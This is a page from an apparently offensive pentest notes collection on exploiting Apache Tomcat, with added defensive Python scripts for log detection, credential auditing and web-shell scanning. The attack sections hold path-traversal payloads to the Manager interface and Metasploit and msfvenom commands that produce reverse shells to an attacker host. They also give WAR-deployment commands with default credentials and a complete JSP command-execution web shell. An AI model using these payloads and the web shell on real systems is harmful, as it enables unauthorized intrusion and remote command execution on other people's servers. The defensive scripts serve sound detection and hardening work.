# Exploitation

#### Topics

> 1. [Lab Setup & Configuration](/home/common-services-pentest/web-services-80-443-8080/tomcat/lab-setup-and-configuration.md)
> 2. [Enumeration](/home/common-services-pentest/web-services-80-443-8080/tomcat/enumeration.md)
> 3. [Exploitation](/home/common-services-pentest/web-services-80-443-8080/tomcat/exploitation.md)
> 4. [Mitigation & Hardening](/home/common-services-pentest/web-services-80-443-8080/tomcat/mitigation-and-hardening.md)

## **Common Vulnerabilities**

1. **Password Backtrace Disclosure**\
   Visiting **/auth.jsp** might reveal passwords in backtraces.
2. **Double URL Encoding**\
   Vulnerabilities like CVE-2007-1860 allow access to the management interface via a double-encoded traversal sequence (`%252E%252E` decodes to `..`):

   ```url
   pathTomcat/%252E%252E/manager/html
   ```
3. **Insecure Example Scripts**\
   Apache Tomcat versions 4.x–7.x ship example applications susceptible to XSS or information disclosure, for instance:
   * `/examples/jsp/num/numguess.jsp`
   * `/examples/servlet/HelloWorldExample`

   Check and restrict access to these paths.
4. **Path Traversal**\
   Exploit path traversal with:

   ```url
   <tomcat_target_ip>/lalala/..;/manager/html
   ```

   or

   ```url
   http://<tomcat_target_ip>/;param=value/manager/html
   ```
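Detecting these bypass attempts comes down to normalizing the request path the way the container will and comparing that with what was literally requested. The following Python script is an added example and not part of this page's original material: it runs over a few constructed access-log lines and flags requests that reach `/manager/` through double encoding, `..;` traversal or `;param=` path parameters, plus probes of the stock `/examples/` app. The log lines, indicator names and the normalization logic are assumptions made for the demo, not Tomcat's actual parser.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed Tomcat access-log lines (common log format) for the demo; not from any real host.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /lalala/..;/manager/html HTTP/1.1" 200 5123
10.0.0.5 - - [12/Mar/2024:10:01:05 +0000] "GET /%252E%252E/manager/html HTTP/1.1" 404 1024
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /;param=value/manager/html HTTP/1.1" 200 5123
10.0.0.9 - - [12/Mar/2024:10:02:00 +0000] "GET /examples/servlet/HelloWorldExample HTTP/1.1" 200 300
192.168.1.20 - - [12/Mar/2024:10:03:00 +0000] "GET /myapp/index.jsp HTTP/1.1" 200 2048
192.168.1.20 - - [12/Mar/2024:10:03:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(path):
    """Approximate the path the servlet container ends up resolving: decode twice
    (so %252E%252E becomes '..'), drop ';...' path parameters, collapse repeated
    slashes and resolve '..' segments."""
    decoded = unquote(unquote(path))
    no_params = re.sub(r";[^/]*", "", decoded)
    return posixpath.normpath(re.sub(r"/+", "/", no_params))


def indicators(path):
    """Name the obfuscation and probing tricks present in a raw request path."""
    found = []
    if unquote(path) != unquote(unquote(path)):
        found.append("double-url-encoding")
    if "..;" in path:
        found.append("semicolon-traversal")
    elif ".." in unquote(unquote(path)):
        found.append("dot-dot-traversal")
    if re.search(r"/;[^/]*/", path):
        found.append("path-parameter")
    if normalize(path).lower().startswith("/examples/"):
        found.append("example-app-probe")
    return found


def scan_log(text):
    """Flag requests that reach the Manager app through an obfuscated path, plus
    any probing of the stock example apps. Plain /manager hits are ordinary
    admin traffic and are not reported."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m.group("path")
        norm = normalize(raw)
        inds = indicators(raw)
        obfuscated = [i for i in inds if i != "example-app-probe"]
        if (norm.startswith("/manager/") and obfuscated) or "example-app-probe" in inds:
            alerts.append({
                "ip": m.group("ip"),
                "path": raw,
                "normalized": norm,
                "status": int(m.group("status")),
                "indicators": inds,
            })
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['ip']:>14} {a['status']} {a['path']} -> {a['normalized']} {a['indicators']}")
```

Note that the second sample line is reported even though it returned 404: the point of the rule is the attempt, not whether it succeeded, and a run of such 404s from one source is the usual precursor to the one request that works.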

***

## **Using Metasploit Framework**

Metasploit's `tomcat_mgr_upload` module automates the Manager upload path: given valid Manager credentials, it deploys a payload WAR through the Manager application. Launch Metasploit and run the following commands, selecting the module by its full path because the index numbers printed by `search` vary between installations:

```bash
msfconsole -q
search tomcat_mgr_upload
use exploit/multi/http/tomcat_mgr_upload
set rhosts <tomcat_target_ip>
set rport 8080
set httpusername admin
set httppassword password
set payload linux/x86/meterpreter_reverse_tcp
set lhost <attacker_ip>
exploit
```

After successful exploitation a reverse Meterpreter session is returned, allowing command execution on the target through the `meterpreter` shell.

***

## **Remote Code Execution (RCE)**

If you gain access to the **/manager/html** interface, you can upload and deploy a `.war` file to achieve RCE.

Example:

```bash
curl --upload-file shell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/shell"
```

Metasploit can automate this:

```bash
use exploit/multi/http/tomcat_mgr_upload
```

To create a reverse shell WAR file:

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o shell.war
```
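Every technique in this section depends on valid Manager credentials, so the first hardening check is the credential file itself. The following Python script is an added example, not from this page or the Tomcat project: it parses a constructed `conf/tomcat-users.xml` and, for every user holding a Manager or Host Manager role, flags passwords from a made-up list of commonly guessed values, passwords equal to the username, and accounts that combine `manager-gui` with `manager-script` (the Tomcat Manager How-To advises against granting both to one user). The sample users, their passwords and the weak-password list are constructed for the demo.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml following the stock file's layout; the users and
# passwords are made up for the demo.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="password" roles="manager-gui,manager-script"/>
  <user username="admin" password="password" roles="admin-gui,manager-gui"/>
  <user username="deploy" password="Vq8!kL2#pR7$wN4z" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
  <user username="appuser" password="appuser" roles="app-role"/>
</tomcat-users>
"""

# Roles that grant access to the Manager or Host Manager applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                    "admin-gui", "admin-script"}

# Constructed list of passwords that are commonly guessed first against the Manager login.
WEAK_PASSWORDS = {"", "tomcat", "password", "admin", "manager", "s3cret", "changeit", "root", "12345"}


def audit_tomcat_users(xml_text):
    """Return one finding per weakness found on users that hold a privileged role."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if el.tag.split("}")[-1] != "user":   # strip the xmlns prefix
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if not privileged:
            continue   # ordinary application users are out of scope here
        if password.lower() in WEAK_PASSWORDS or password.lower() == name.lower():
            findings.append({"user": name, "issue": "weak-password", "roles": privileged})
        if {"manager-gui", "manager-script"} <= roles:
            findings.append({"user": name, "issue": "gui-and-script-on-one-user",
                             "roles": privileged})
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{f['user']:<10} {f['issue']:<28} {','.join(f['roles'])}")
```

The script only looks at plaintext passwords; if the realm is configured with a `CredentialHandler` the stored values are digests and the weak-list comparison no longer applies, which is itself the state you want to reach.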

***

## **Other Methods**

1. **TomcatWarDeployer**\
   Deploy shells or bind shells via:

   ```bash
   ./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
   ```
2. **Clusterd**\
   Automate testing:

   ```bash
   clusterd.py -i <attacker_machine> -a tomcat -v 5.5 --gen-payload <tomcat_target_ip>:4444 --deploy shell.war
   ```
3. **Manual Web Shell**\
   Example JSP for command execution:

   ```jsp
   <FORM METHOD=GET ACTION='index.jsp'>
   <INPUT name='cmd' type=text>
   <INPUT type=submit value='Run'>
   </FORM>
   <%@ page import="java.io.*" %>
   <%
      String cmd = request.getParameter("cmd");
      String output = "";
      String s;   // declared here; the loop below used s without a declaration and did not compile
      if(cmd != null) {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"<br>"; }
      }
   %>
   <pre><%=output %></pre>
   ```

   Package it into a WAR file and upload it.
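On the defensive side, a deployed web shell leaves two traces: a new entry under `webapps/` and a JSP that hands request input to a process. The following Python script is an added example, not part of the original page or of any tool it lists: it builds a throwaway `webapps` tree with one benign app and one constructed `shell` deployment, then reports JSP files containing `Runtime.getRuntime().exec`, `ProcessBuilder`, `defineClass` or `cmd`-style parameter handling, and any deployment missing from an allow-list. The directory layout, pattern names and allow-list are assumptions for the demo.

```python
import os
import re
import tempfile

# Source patterns that are the core of JSP web shells and almost never appear in
# ordinary page templates.
SUSPICIOUS = {
    "runtime-exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("),
    "process-builder": re.compile(r"new\s+ProcessBuilder\s*\("),
    "cmd-from-request": re.compile(r'request\s*\.\s*getParameter\s*\(\s*"(?:cmd|command|exec)"\s*\)'),
    "define-class": re.compile(r"\bdefineClass\s*\("),
}
JSP_EXTENSIONS = (".jsp", ".jspx", ".jspf")


def scan_jsp(text):
    """Return the sorted names of suspicious patterns found in one JSP source."""
    return sorted(name for name, rx in SUSPICIOUS.items() if rx.search(text))


def scan_webapps(webapps_dir, expected_apps=()):
    """Walk a Tomcat webapps directory. Report JSP files with shell-like code and,
    when an allow-list is given, any deployment (exploded dir or .war) not on it."""
    findings = []
    for entry in sorted(os.listdir(webapps_dir)):
        app = entry[:-4] if entry.endswith(".war") else entry
        path = os.path.join(webapps_dir, entry)
        if expected_apps and app not in expected_apps:
            findings.append({"app": entry, "file": None,
                             "issue": "unexpected-deployment", "patterns": []})
        if not os.path.isdir(path):
            continue
        for dirpath, _, files in os.walk(path):
            for fn in files:
                if not fn.lower().endswith(JSP_EXTENSIONS):
                    continue
                full = os.path.join(dirpath, fn)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits = scan_jsp(fh.read())
                if hits:
                    findings.append({"app": entry, "file": os.path.relpath(full, webapps_dir),
                                     "issue": "shell-like-jsp", "patterns": hits})
    return findings


def build_sample_webapps():
    """Create a throwaway webapps tree with one benign app and one constructed
    shell deployment, so the scanner can be run offline."""
    root = tempfile.mkdtemp(prefix="webapps-")
    os.makedirs(os.path.join(root, "ROOT"))
    with open(os.path.join(root, "ROOT", "index.jsp"), "w") as fh:
        fh.write("<html><body>Served at <%= new java.util.Date() %></body></html>\n")
    os.makedirs(os.path.join(root, "shell"))
    with open(os.path.join(root, "shell", "index.jsp"), "w") as fh:
        # Constructed fixture containing the exec-from-request pattern the scanner looks for.
        fh.write('<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>\n')
    with open(os.path.join(root, "shell.war"), "wb") as fh:
        fh.write(b"")   # leftover archive from the deployment
    return root


if __name__ == "__main__":
    sample = build_sample_webapps()
    for f in scan_webapps(sample, expected_apps=("ROOT", "docs", "manager", "host-manager")):
        print(f"{f['issue']:<22} {f['file'] or f['app']} {f['patterns']}")
```

Run against a real install, point `scan_webapps` at `$CATALINA_BASE/webapps` with the allow-list taken from your deployment inventory; the pattern list is a starting point and will miss shells that obfuscate the method names, so pair it with the deployment check and with the Manager access-log review above.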

***

## **Other Tools**

* [Apache Tomcat Scanner](https://github.com/p0dalirius/ApacheTomcatScanner)
